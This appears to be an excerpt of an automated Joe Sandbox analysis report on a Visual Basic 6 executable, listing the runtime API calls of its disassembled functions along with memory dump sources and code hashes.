                                                                                                                                                                                  • _adj_fdiv_m64.MSVBVM60 ref: 0041385F
                                                                                                                                                                                  • __vbaR8IntI4.MSVBVM60 ref: 0041386E
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413885
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 004138B8
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413900
                                                                                                                                                                                  • _adj_fdiv_m64.MSVBVM60 ref: 00413935
                                                                                                                                                                                  • __vbaR8IntI4.MSVBVM60 ref: 00413944
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413957
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0041397D
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(004074B4,00000000), ref: 0041398E
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 004139C5
                                                                                                                                                                                  • _adj_fdiv_m64.MSVBVM60 ref: 004139F6
                                                                                                                                                                                  • __vbaR8IntI4.MSVBVM60 ref: 00413A05
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413A18
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413A38
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00413A47
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413A76
                                                                                                                                                                                  • _adj_fdiv_m64.MSVBVM60 ref: 00413AA7
                                                                                                                                                                                  • __vbaR8IntI4.MSVBVM60 ref: 00413AB6
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413AC9
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413AE9
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413B1A
                                                                                                                                                                                  • _adj_fdiv_m64.MSVBVM60 ref: 00413B4F
                                                                                                                                                                                  • __vbaR8IntI4.MSVBVM60 ref: 00413B5E
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413B75
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413B93
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00406E00,00000000), ref: 00413BB0
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00413BBA
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00413BC6
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00413BD2
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00413C2A
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413C79
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413C91
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413CAD
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(004074B4,00000000), ref: 00413CC2
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413CF5
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413D0D
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413D29
                                                                                                                                                                                  • #537.MSVBVM60(?,?), ref: 00413D49
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?), ref: 00413D57
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,?), ref: 00413D5A
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?), ref: 00413D64
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?), ref: 00413D6C
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(?,?), ref: 00413DC0
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00413DCA
                                                                                                                                                                                  • #537.MSVBVM60(00000000), ref: 00413DCE
                                                                                                                                                                                  • _adj_fdiv_m64.MSVBVM60(00000008,?), ref: 00413E47
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(?,00000008,?), ref: 00413E72
                                                                                                                                                                                  • __vbaFpI4.MSVBVM60(?,00000008,?), ref: 00413EA0
                                                                                                                                                                                  • #606.MSVBVM60(00000000,?,00000008,?), ref: 00413EAD
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00413EB7
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00413EBA
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00413EC4
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000008,?), ref: 00413ECC
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60(?,00000008,?), ref: 00413ED8
                                                                                                                                                                                  • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413EEA
                                                                                                                                                                                  • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F02
                                                                                                                                                                                  • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F1A
                                                                                                                                                                                  • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F32
                                                                                                                                                                                  • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F4A
                                                                                                                                                                                  • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F62
                                                                                                                                                                                  • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F7A
                                                                                                                                                                                  • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F92
                                                                                                                                                                                  • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413FAA
                                                                                                                                                                                  • #606.MSVBVM60(00000002,00000008,?,00000008,?), ref: 00413FC9
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00413FD3
                                                                                                                                                                                  • #537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 00413FD8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00413FE6
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00413FE9
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00413FF3
                                                                                                                                                                                  • #537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 00413FF8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414006
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414009
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414013
                                                                                                                                                                                  • #537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 00414018
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414026
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414029
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414033
                                                                                                                                                                                  • #537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 00414038
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414046
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414049
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414053
                                                                                                                                                                                  • #537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 00414058
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414066
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414069
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414073
                                                                                                                                                                                  • #537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 00414078
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414086
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414089
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414093
                                                                                                                                                                                  • #606.MSVBVM60(00000006,00000008,00000000,?,00000008,?), ref: 0041409F
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004140A9
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004140AC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004140B6
                                                                                                                                                                                  • #581.MSVBVM60(&H68,00000000,?,00000008,?), ref: 004140BE
                                                                                                                                                                                  • __vbaFpI4.MSVBVM60(?,00000008,?), ref: 004140C4
                                                                                                                                                                                  • #537.MSVBVM60(00000000,?,00000008,?), ref: 004140CB
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004140D9
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004140DC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004140E6
                                                                                                                                                                                  • #537.MSVBVM60(00000003,00000000,?,00000008,?), ref: 004140EB
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004140F9
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004140FC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414106
                                                                                                                                                                                  • #606.MSVBVM60(00000002,00000008,00000000,?,00000008,?), ref: 00414112
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041411C
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041411F
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414129
                                                                                                                                                                                  • #537.MSVBVM60(00000016,00000000,?,00000008,?), ref: 0041412E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041413C
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041413F
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414149
                                                                                                                                                                                  • #606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 00414155
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041415F
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414162
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041416C
                                                                                                                                                                                  • #537.MSVBVM60(00000028,00000000,?,00000008,?), ref: 00414171
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041417F
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414182
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041418C
                                                                                                                                                                                  • #606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 00414198
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141A2
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004141A5
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141AF
                                                                                                                                                                                  • #537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 004141B4
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141C2
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004141C5
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141CF
                                                                                                                                                                                  • #606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 004141DB
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141E5
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004141E8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141F2
                                                                                                                                                                                  • #537.MSVBVM60(00000020,00000000,?,00000008,?), ref: 004141F7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414205
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414208
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414212
                                                                                                                                                                                  • #606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 0041421E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414228
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041422B
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414235
                                                                                                                                                                                  • #537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 0041423A
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414248
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041424B
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414255
                                                                                                                                                                                  • #537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 0041425A
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414268
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041426B
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414275
                                                                                                                                                                                  • #537.MSVBVM60(00000018,00000000,?,00000008,?), ref: 0041427A
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414288
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041428B
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414295
                                                                                                                                                                                  • #606.MSVBVM60(00000005,00000008,00000000,?,00000008,?), ref: 004142A1
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142AB
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004142AE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142B8
                                                                                                                                                                                  • #537.MSVBVM60(00000040,00000000,?,00000008,?), ref: 004142BD
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142CB
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004142CE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142D8
                                                                                                                                                                                  • #537.MSVBVM60(00000003,00000000,?,00000008,?), ref: 004142DD
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142EB
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004142EE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142F8
                                                                                                                                                                                  • #606.MSVBVM60(00000012,00000008,00000000,?,00000008,?), ref: 00414304
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041430E
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414311
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041431B
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(?,00000000,?,00000008,?), ref: 00414325
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041432F
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000033,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414498
                                                                                                                                                                                  • __vbaFreeVarList.MSVBVM60(00000009,00000008,00000008,00000008,00000008,00000008,00000008,00000008,00000008,00000008,?,00000008,?), ref: 004144DF
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 00414AEA
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00414AFC
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?), ref: 00414B0E
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000), ref: 00414B18
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00414B20
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00414B2C
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00414B34
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 00414B37
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 00414B47
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?,00414D6B,?,00000000), ref: 00414D44
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00414D53
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00414D58
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00414D60
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00414D68
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60(?,00000000), ref: 00414D8A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$Error$#537$BoundsGenerate$Free$#606CheckHresult$_adj_fdiv_m64$AnsiCopy$ListSystem$File$#581#648BstrCloseDestructExitOpenOverflowProcPut3RedimUnicode
                                                                                                                                                                                  • String ID: $&H68$&HA8$h#@
                                                                                                                                                                                  • API String ID: 3305104701-1988485601
                                                                                                                                                                                  • Opcode ID: cd20a7d3b55ef82ee3132964682ea25cd73d0367465c479d272536d82207a749
                                                                                                                                                                                  • Instruction ID: f198cd70f4d496bc7940f7355a5e4fe40ff025cce30350eb0c459dc764c5fff0
                                                                                                                                                                                  • Opcode Fuzzy Hash: cd20a7d3b55ef82ee3132964682ea25cd73d0367465c479d272536d82207a749
                                                                                                                                                                                  • Instruction Fuzzy Hash: A8130C71D002289BCB25DF65DD88BDEBBB9FB48301F1081EAE50AA6250DE745F85CF64
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00403A5C Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9c9b5fadcff6fc1b6333f2045a5fcfbe11ec3f7d18c2f0a438c4e6aacca40780
                                                                                                                                                                                  • Instruction ID: 082b4fd57fed1769b9006e205b6e9b322f4e6cb11cfcb06b4efda431eea04361
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c9b5fadcff6fc1b6333f2045a5fcfbe11ec3f7d18c2f0a438c4e6aacca40780
                                                                                                                                                                                  • Instruction Fuzzy Hash: 85014FA644E3D24FC31387344CA49917FB0AD2311534A02DBC581CB1A3E208994AD762
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00415660 Relevance: 163.2, APIs: 92, Strings: 1, Instructions: 495COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(66107559,00000000,00000000), ref: 004156CA
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004156D2
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001), ref: 004156D6
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 004156EE
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 004156FD
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?), ref: 0041570F
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00415719
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00415721
                                                                                                                                                                                  • #570.MSVBVM60(00000000), ref: 00415724
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 00415734
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00415753
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00415769
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 0041576E
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 00415782
                                                                                                                                                                                  • #525.MSVBVM60(00000000), ref: 00415789
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00415794
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00415799
                                                                                                                                                                                  • __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 004157A3
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                                                    • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 004157B7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(00000003), ref: 004157C8
                                                                                                                                                                                  • #616.MSVBVM60(00000000), ref: 004157CB
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004157D6
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(?,00000000), ref: 004157DD
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 004157FF
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00415824
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(00000004,?), ref: 00415839
                                                                                                                                                                                  • #618.MSVBVM60(00000000), ref: 0041583C
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00415847
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 0041584A
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(00000000), ref: 00415865
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000004,?,?,00000000,00000000), ref: 00415879
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 0041588E
                                                                                                                                                                                  • __vbaGet4.MSVBVM60(00000004,?,-00000005,00000000), ref: 00415898
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00415855
                                                                                                                                                                                    • Part of subcall function 0040EAB0: #594.MSVBVM60(?,660E1A08,-00000001,660E6C30), ref: 0040EB1A
                                                                                                                                                                                    • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60 ref: 0040EB23
                                                                                                                                                                                    • Part of subcall function 0040EAB0: __vbaLenBstr.MSVBVM60 ref: 0040EB2F
                                                                                                                                                                                    • Part of subcall function 0040EAB0: #631.MSVBVM60(?,?,0000000A), ref: 0040EB68
                                                                                                                                                                                    • Part of subcall function 0040EAB0: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
                                                                                                                                                                                    • Part of subcall function 0040EAB0: #516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
                                                                                                                                                                                    • Part of subcall function 0040EAB0: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
                                                                                                                                                                                    • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0000,?), ref: 004158D0
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004158DB
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0000,?), ref: 004158EC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004158F7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00415907
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 0041590C
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00415915
                                                                                                                                                                                  • __vbaFileSeek.MSVBVM60(00000001,00000000), ref: 0041591A
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 00415932
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00415941
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?), ref: 0041594D
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000), ref: 00415957
                                                                                                                                                                                  • #525.MSVBVM60(00001000), ref: 00415962
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0041596D
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004159A3
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004159AC
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004159B4
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004159BD
                                                                                                                                                                                  • #525.MSVBVM60(?), ref: 004159E9
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004159F4
